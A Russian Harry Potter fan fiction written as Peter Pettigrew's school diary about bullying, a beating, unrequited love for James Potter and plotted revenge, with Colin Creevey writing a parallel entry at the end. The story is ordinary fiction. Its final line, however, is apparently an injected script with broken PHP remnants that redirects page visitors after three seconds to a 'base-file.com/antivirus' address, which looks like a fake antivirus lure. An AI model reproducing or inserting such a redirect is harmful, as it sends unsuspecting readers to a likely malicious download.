Маленькая история времени

Автор: Кот Бегемот
Рейтинг: PG-13
Пейринг: Питер Педдигрю
Жанр: драма
Дисклеймер: все и навсегда принадлежит Роулинг.
Архивация: с уведомления автору.

1 сентября

Дурацкий день, дурацкое настроение. Только перед отправлением поезда вспомнил, что не взял из дома старый дневник. Хуже всего, что совершенно не помню, где его оставил. То ли засунул под шкаф, то ли кинул под кровать – надо же было отцу припереться в мою комнату, чтобы прочесть никому не нужную лекцию о правилах приличия. Ему не понравилось, видите ли, как я разговариваю с этой ненормальной соседкой. Нет, отец не кричал, но слушать два часа эту галиматью про магглов, которые и понятия не имеют о волшебниках, было просто невыносимо. Короче, про дневник я забыл. Хорошо, если отец случайно не наткнется на него. А вдруг? Тогда пиши: пропало. Вряд ли он одобрит мой выбор. Ха! Какое одобрит – просто укажет мне на дверь. Мать, конечно, о чем-то таком догадывается, но из деликатности молчит. Перечить отцу уж точно не будет. Но, может, у нее хватит ума переслать мне дневник (если она его найдет)? Хороший урок для меня – больше не буду писать в дневнике свои юношеские возлияния. Тем более, такие.

Да, кстати, Лили сегодня весь вечер строила мне глазки. Вот дура – решила позлить Поттера, который в поезде вдруг решил обидеться на нее из-за какой-то глупости. Списать проверочную по истории магии Джеймс теперь точно не даст…

5 сентября

Точно теперь понимаю, как ненавижу свое собственное отражение в зеркале. Почему все, что я унаследовал от родителей, так это маленький рост, серые бесцветные глаза и отвратительную крысиную физиономию? Люциус Малфой за обедом намекнул, что среди мышей я буду в почете. Интересно, ему известно, что Сириус, Джеймс и я – незарегистрированные анимаги? Вряд ли. Этот самодовольный слизеринец тут же бы растрепал об этом всему Хогвардсу. Черт с ним, говорят, он связался с Риддьлем.

6 сентября.

Первая тренировка по квиддичу. От одной только мысли ненавижу себя. Я хочу парить над этим чертовым полем, чтобы ветер трепал мои волосы. Хочу улыбаться ему. Представляю, как расхохотался бы Сириус, если бы я только заикнулся о месте в команде. Чертов Сириус.

10 октября.

Будь ты проклят, Люциус! Будь я проклят сам! Какого черта понадобилось доказывать самому себе, что могу летать? В сборную Гриффиндора меня все равно никогда не возьмут. А этот урод уж точно всем расскажет. И про мою жалкую метлу, и про три метра высоты, и про тайком украденную у Джеймса форму.

11 октября.

Лили сказала, что у меня распухли глаза. Римус деликатно промолчал – он видел, как я, накрывшись подушкой, реву, словно маленький ребенок. Он, дурачок, наверное, подумал, что я плачу от оскорблений Тома и Люциуса за завтраком. И никто за меня не заступился! Даже Джеймс от души похохотал, не забыв добавить, что если я еще раз когда-нибудь возьму его форму…

17 октября.

Родители прислали мне новую метлу. На кой черт она мне теперь?

18 октября.

Папа, мама! Спасибо! От счастья я готов взлететь в воздух. Мы сегодня одержали победу в матче со Слизерином. И благодаря вашему подарку! Джеймс попросил меня одолжить ему мою метлу. И мы выиграли! Джеймс даже потрепал меня по плечу в знак благодарности. Мерлин, как я хотел кинуться ему на шею и поцеловать…

15 ноября

Полнолуние. Римуса опять нет в Хогвардсе. Сириус и Джеймс опять рассказывают мне сказки про белого бычка. Вот умора! Можно подумать, я не знаю, что Люпин – оборотень. На кой мне тогда превращаться в крысу и пробираться в Драчливую Иву?

18 ноября.

Том Риддль начал как-то странно на меня смотреть, даже предложил в выходные прогуляться в Хогсмид. Вообще-то я не понимаю, с чего бы вдруг? Он – староста, я – никто и зовут меня никак. Не пойти – обзовут трусом, пойти – Снейп и Люциус опять превратят меня в какой-нибудь куст шиповника, как в прошлом году. Может, попросить помощи у Джеймса? И опять нарваться на насмешку?

19 ноября.

В общем, я рассказал Джеймсу, а он не преминул передать наш разговор Сириусу и Римусу. Лили в очередной раз разругалась с Поттером – бальзам на мою душу.

21 ноября.

Ненавижу. Малфой и Снейп сначала обездвижили меня, а потом просто раздели до трусов и утопили мою одежду в озере. Зачем? Чтобы потрафить Тому, который привык получать удовольствие от унижения других? Эти уроды предложили стучать обо всём, что происходит в Гриффиндоре. Поттер, Блэк и Люпин, помирая от смеха, появились только тогда, когда слизеринцы смотали удочки. Они же знали, я же им говорил! Спасибо Римусу – он дал мне свою мантию, чтобы я хоть как-то прикрылся. Не знаю, почему Джеймс так брезгливо поморщился, когда Люпин протянул мне робу. А как же метла? Или он ее сначала дезинфицирует?

22 ноября.

Напросился на тренировку перед матчем с Ровенкло. И зачем, спрашивается? Чтобы еще раз осознать свое полное ничтожество? Кому какое дело до серенького мальчишки в смешном колпачке? Кстати, метлу Джеймс уже почти прикарманил. Ну и черт с ней. По крайней мере, мне хотя бы разрешают присутствовать на тренировках.

27 ноября.

Весь день хожу в приподнятом настроении. Ночью приснился сон, будто бы я спас Джеймсу жизнь. В моих снах Поттер был всегда другим – он улыбался мне, брал меня за руку, рассказывал о чем-то хорошем и добром. Мерлин, когда же я, наконец, найду в себе силы признаться…

9 декабря.

Сейчас три часа утра. Или ночи? Я их застал! Джеймса и Лили! Я знал, я догадывался, но не хотел верить! К черту весь этот Хогвардс – завтра же напишу родителям, что уезжаю домой. Будь оно все проклято!

10 декабря.

Я знаю, что поступил подло, демонстративно забрав у Поттера свою метлу, из-за чего Гриффиндор проиграл Ровенкло. Джеймсу просто не хватило скорости, чтобы перехватить снитч. Сириус пригрозил разбить мне башку. Ну и пусть. По крайней мере, Лили меня поддержала, заявив, что Джеймсу пора перестать использовать друзей для достижения собственных целей. Римус сказал, что Поттер был вне себя от злости.

11 декабря.

Ну почему время так долго тянется? Еще за завтраком Джеймс подошел ко мне и попросил прощения за… Я так и не понял, за что, собственно? Это я должен ползать перед ним на коленях – после вчерашнего со мной никто не разговаривает. Благодарю небеса! Завтра Джеймс обещал взять меня с собой в Хогсмид и угостить всех – Лили, Сириуса и Римуса - хмельным элем.

12 декабря.

Мадам Помфрей заявила, что ничего страшного с моим лицом не произошло. Подумаешь, мол, пара синяков и кровоподтеков. Шрамы украшают мужчину, ведь так? Сириус бил меня методично, с каким-то остервенением, словно старался уничтожить меня раз и навсегда. Джеймс лишь улыбался, стоя в стороне. Каким же я был дураком, поверив в свое вчерашнее счастье! Это была продуманная ловушка - расквитаться со мной за проигрыш и метлу. Удары сыпались один за другим, но боль лишь тупым эхом отзывалась где-то вдалеке: я смотрел на Джеймса, словно затравленная собака. А он… он брезгливо улыбался.

13 декабря.

Никогда не видел Римуса в гневе – он орал на Джеймса так, что, казалось, стены гриффиндорской гостиной разлетятся в пыль. Еще мгновение, и Блэк бы кинулся к кулаками на Люпина. Но мне все равно: я знаю, что Джеймс ненавидит меня. Ненавидит и брезгует смотреть в мою сторону. Написал родителям, что возвращаюсь домой. Все, с меня хватит, к черту все мои чувства и юношеские бредни.

14 декабря.

Может, оно и к лучшему. Возвращаться мне некуда: получил от отца письмо, в котором он перекипевшим тоном сообщает, что таким как я не место в его доме. К лапке совы, правда, была привязана маленькая записочка от мамы, где залитыми от слез чернилами было написано, что она меня любит. Мама, я тебя тоже люблю. Прости.

20 декабря.

Ничего не пишу вот уже неделю. Да и мыслей никаких нет – дни превратились в сплошные серые тучи. В Хогвардсе уже все знают, откуда у меня ссадины, и почему я хромаю. Говорят, Директор был вне себя от ярости, когда вызывал Сириуса в кабинет. Мне все равно. Я знаю, как отомстить ему и без помощи кого-либо. Римус почти не отходит от меня – видимо, чувствует.

Кстати, Джеймс опять не ночевал в спальне. Лили появилась под утро, а через полчаса тихой сапой прошмыгнул Поттер.

23 декабря.

Рождественский бал и все такое. Я уже привык, что Римус рядом со мной, но опять полнолуние – не самые лучшие для него деньки. Жаль бедолагу, он наивно полагает, что я все забуду и прощу.

Лили пригласила меня на танец. Зачем она это сделала? Хотела утешить меня или позлить Поттера? Испепеляющий взгляд Джеймса не лучший для меня подарок к Рождеству.

24 декабря.

Холодно и горячо. Леденящая пустота. Я знаю, Джеймс мне не соврал, когда, оттащив меня в сторону, заявил, что он и Лили обручились. Судьба отшвырнула меня в сторону как слепого котенка. Джеймс, ты не мог… ты не имеешь права, после того… Я расскажу тебе… я…

25 декабря.

Изумленный взгляд и обычное презрение. На что я, наивный, мог рассчитывать? На его понимание? Глупость! На его ответные чувства? Идиотизм! На снисходительную дружбу? Оно мне это надо? Нет, ты не прав, Джеймс, – я не безвольный серый человечек с дурными наклонностями, ибо нашел в себе силы признаться, что люблю тебя. И всегда любил. Хочешь ты того или нет. Жизнь – она сама расставит все точки над «i». Я любил тебя, а ты кинул мне подачку вроде снисходительной дружбы, а потом и ее отнял.

20 февраля.

Это моя последняя запись в дневнике. Я принял решение, у меня есть цель. Говорят, месть подают в холодном виде? Ради своей цели я поступился со своими чувствами – одному Мерлину известно, чего мне стоило сделать вид, что между мною, Сириусом и тобой, Джеймс, ничего произошло. Я прикидываюсь вашим другом, но у меня нет больше друзей – есть только сообщники, которых я использую, чтобы отомстить Поттеру. Я знаю, как и каким образом. Мой час еще не настал, но я, Том, Снейп и Люциус станем тенью возмездия, которое тебя обязательно настигнет.

Питер Педдигрю.

Светловолосый юноша молча пролистнул последнюю страничку выцветшей от времени тетрадки. Прошло столько времени, а отзвуки чужой боли, ненависти и любви держали его в плену. Он читал и перечитывал этот дневник, каждый раз поражаясь, насколько цинична и жестока история. История времени, которое имеет отвратительное свойство возвращаться назад и начинать свой бег снова и снова. Тени прошлого – разве они когда-нибудь исчезают? Кому был нужен Питер, с его искренним, но никому не понятным чувством? Римусу? Или Блэку, который ради слепой верности Джеймсу готов был растоптать любого?..

Юноша вытащил из маленького тайника аккуратно сложенный свиток пергамента и торопливо, стараясь оставаться никем незамеченным, начал писать:

20 января.

Моя последняя запись в дневнике. Я знаю, что меня ждет – я видел это в прошлом, тени которого стоят передо мной как наяву. Мне остается только покориться судьбе и молча следовать за ней. В конце концов, что я могу изменить? Помолвку Гермионы и Гарри, который, смеясь, швырнул обратно мне в лицо кусочек моего наивного и любящего сердца? Да кем я был для него? Назойливой мухой? Вечной прилипалой, которого из приличия терпели его верные оруженосцы Рон и Симус? Мне не нужны эти подачки вроде неискренних и глупых слов «останемся друзьями». У меня есть цель, и я буду к ней стремиться. Мне не стыдно признаться, что люблю Гарри Поттера. И всегда любил. За что ненавижу и себя, и его. Мой час еще не настал, но мы – Драко Малфой, Блез Забини, Панси Паркинсон и я – станем тенью возмездия, которое рано или поздно настигнет его.

Колин Криви.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>